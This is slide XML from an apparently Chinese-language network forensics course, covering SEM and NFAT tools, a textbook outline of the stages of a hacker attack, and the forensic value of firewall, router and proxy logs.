            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以自动地关联多个数据源的事件，提取相关信息并显示给使用者。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件的功能依靠从其它来源得到信息，其价值取决于什么样的网络数据源提供信息，各个源的可靠程度以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件规范数据和关联事件的能力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7992888" cy="3516347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络取证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是针对网络环境下的犯罪行为进行的，因此要想更有效的进行取证工作，就必须熟悉网络犯罪——主要是黑客的攻击手段和步骤。黑客的攻击步骤被描述为以下几步：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Information Gathering)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：攻击者事先汇集目标的信息，进行知识和情报准备以及策划，此时尚未触及受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>踩点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：扫描目标系统，对网络结构、网络组成、接入方式等进行探测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Enumerating)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：搜索目标系统上的用户和用户组名、路由表、共享资源、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>探测弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Probing for Weaknesses)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：尝试目标主机的弱点、漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>突破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Penetration)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：针对弱点、漏洞发送精心构造的数据，完成对目标主机的访问权由普通用户到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限的提升，达到对受害者系统的窃取、破坏等目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建后门、种植木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dooring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>etc)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等：方便攻击者下次重新侵入主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>清除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Cleanup)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、掩盖入侵踪迹：包括禁止系统审计、清空事件日志、隐藏作案工具以及用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>替换操作系统文件等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="1061829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是为帮助网络通信分析特别设计的，所以只有当它监控到相关事件时，才具有价值。其通常的特色是支持分析，如通信重现和可视化。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="12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6.5.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查数据源</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="771550"/>
            <a:ext cx="7272808" cy="3000821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．防火墙、路由器、代理服务器和远程访问服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通常，这些数据源记录着事件很少的信息，缺乏深入事件本质的数据，因而价值很小。而且，日志每天产生，数据的急速增长是可怕的。长时间分析才可以显示整体趋势，如被阻塞的连接的增多。这些数据的价值在于关联事件。例如，一个主机被攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的传感器探测到了攻击，那么查询防火墙日志中明显的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的事件，或许能够确定攻击从哪里进入网络，以及哪些主机还有可能被攻击。另外，这些设备执行的地址映射（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
